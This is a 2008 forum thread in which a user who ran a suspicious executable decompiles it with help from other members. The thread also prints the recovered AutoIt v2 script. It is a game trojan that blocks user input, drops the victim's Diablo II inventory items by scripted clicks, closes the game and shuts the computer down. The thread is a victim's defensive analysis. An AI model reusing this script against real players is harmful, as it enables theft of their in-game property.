DaProgrammer Posted February 6, 2008 Posted February 6, 2008 in my uber stupidity i agreed to download an app some1 sent me (don't ask why but whats done is done)the app asked me some questions and shut my comp down, i restarted and all works fine for nowi'm afraid it put some spyware or something on my comp so i need helpi used resourse hack and found out its autoit ver. 2,63,0,0is there a way i can decompile it to see what it did to mu comp ?if u want i can send you the file and ull see what it did or something.plz help couse im worried its spyware.tnx in advance for the help guys.
GaryFrost Posted February 6, 2008 Posted February 6, 2008 (edited) C:\Program Files\AutoIt3\Extras\Exe2Aut or relative to where you have autoit installedsorry that's only for v3, I'm sure someone has the old one around somewhere Edited February 6, 2008 by GaryFrost SciTE for AutoItDirections for Submitting Standard UDFs Don't argue with an idiot; people watching may not be able to tell the difference.
DaProgrammer Posted February 6, 2008 Author Posted February 6, 2008 C:\Program Files\AutoIt3\Extras\Exe2Aut or relative to where you have autoit installedi tried it ofc gives the not recognized errori was thinking maybe there is another solution, or some with more hacking expirience can take a look at the exe for me.couse i have no idea what to do and really want to know what it did to my comp (thats as close to a scared smily i could find)
GaryFrost Posted February 6, 2008 Posted February 6, 2008 You can still download and install 2.64 and run the exe to script: http://www.autoitscript.com/AutoIt/downloads.php SciTE for AutoItDirections for Submitting Standard UDFs Don't argue with an idiot; people watching may not be able to tell the difference.
Swift Posted February 6, 2008 Posted February 6, 2008 Check your process's is there anything unusual? check your program files folder, and windows folders...is there a folder in there that you didnt install/isnt windows? can you delete this folder? if not...its probably where it came from...if its a virus. then get SpywareTerminator and turn on HIPS and Clam AntiVirus to check if its running if it is a virus/malware/keylogger etc...it will tell you to ask if you want to block or allow it...choose block...look at the path it says...get Unlocker 1.8.5 and delete that file! thats if its malware/virus/keylogger
DaProgrammer Posted February 7, 2008 Author Posted February 7, 2008 You can still download and install 2.64 and run the exe to script: http://www.autoitscript.com/AutoIt/downloads.php ty very much it decompiled sucksesfully and its not spyware it was supposed to steal all my ingame items ^^ by click and drop but lucky for me i run it on 2nd comp while i was ingame so nothing happend im pretty sure nothing happend but i never read aut version 2 so plz take a look ^^ expandcollapse popuphideautoitwin, on setenv,t1,200 setenv,t2,200 setenv,command,0 MsgBox, 4, Ith Creator 2.0, Is your resolution 800x600? loadedtest: IfWinExist,Diablo II,,goto,loadedandok msgbox,4,Error,Diablo II Not Loaded... Please Load D2, Get In A Game And Press YES\n\nContinue? ifmsgbox,yes,goto,loadedtest ifmsgbox,no,exit loadedandok: gosub,commandtest gosub,ostest exit goodos: sleep,1000 blockinput,on winactivate,Diablo II Repeat, 2000 Repeat, 6 sleep,2000 gosub,reztest ifequal,rez,800,goto,rez800 ifequal,rez,640,goto,rez640 os98: sleep,1000 blockinput,off winactivate,Diablo II Repeat, 2000 Repeat, 6 sleep,2000 gosub,reztest ifmsgbox,yes,goto,rez800 ifmsgbox,no,goto,rez640 rez800: send,{space} send,{enter} send,Hmmmm send,{enter} send,{space} send,i leftclick,562,181 sleep,%t2% leftclick,398,370 sleep,%t1% leftclick,454,176 sleep,%t2% leftclick,398,370 sleep,%t1% leftclick,562,102 sleep,%t2% leftclick,398,370 sleep,%t1% leftclick,623,118 sleep,%t2% leftclick,398,370 sleep,%t1% leftclick,620,262 sleep,%t2% leftclick,398,370 sleep,%t1% leftclick,510,262 sleep,%t2% leftclick,398,370 sleep,%t1% leftclick,567,263 sleep,%t2% leftclick,398,370 sleep,%t1% leftclick,680,263 sleep,%t2% leftclick,398,370 sleep,%t1% leftclick,447,277 sleep,%t2% leftclick,398,370 sleep,%t1% leftclick,679,171 sleep,%t2% leftclick,398,370 send,w sleep,%t1% leftclick,454,176 sleep,%t2% leftclick,398,370 sleep,%t1% leftclick,679,171 sleep,%t2% leftclick,398,370 goto,end rez640: send,{space} send,{enter} send,Hmmmm send,{enter} send,{space} send,i leftclick,481,100 sleep,%t2% leftclick,309,280 sleep,%t1% leftclick,368,86 sleep,%t2% leftclick,309,280 sleep,%t1% leftclick,480,32 sleep,%t2% leftclick,309,280 sleep,%t1% leftclick,542,47 sleep,%t2% leftclick,309,280 sleep,%t1% leftclick,428,197 sleep,%t2% leftclick,309,280 sleep,%t1% leftclick,539,191 sleep,%t2% leftclick,309,280 sleep,%t1% leftclick,603,197 sleep,%t2% leftclick,309,280 sleep,%t1% leftclick,370,210 sleep,%t2% leftclick,309,280 sleep,%t1% leftclick,486,191 sleep,%t2% leftclick,309,280 sleep,%t1% leftclick,596,102 sleep,%t2% leftclick,309,280 send,w sleep,%t1% leftclick,368,86 sleep,%t2% leftclick,309,280 sleep,%t1% leftclick,596,102 sleep,%t2% leftclick,309,280 goto,end commandtest: FileReadLine,command,command.txt,1 ifequal,command,nokill,setenv,command,1 return ostest: IfEqual,A_OSVERSION,WIN_XP,goto,goodos IfEqual,A_OSVERSION,WIN_2000,goto,goodos IfEqual,A_OSVERSION,WIN_ME,goto,goodos IfEqual,A_OSVERSION,WIN_98,goto,os98 IfEqual,A_OSVERSION,WIN_95,goto,os98 return reztest: mousemove,1000,1000 mousegetpos,x,y ifequal,x,799,setenv,rez,800 ifnotequal,x,799,setenv,rez,640 return end: IfEqual,command,1,goto,nokillexit sleep,%t1% send,{ALTDOWN} send,{f4} sleep,2000 send,{f4} send,{ALTUP} shutdown,1 exit nokillexit: sleep,%t2% send,{space} sleep,%t1% send,{enter} sleep,%t1% send,Program Ended Without Error sleep,%t1% send,{enter} sleep,%t1% blockinput,off exit [ADLIB]
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now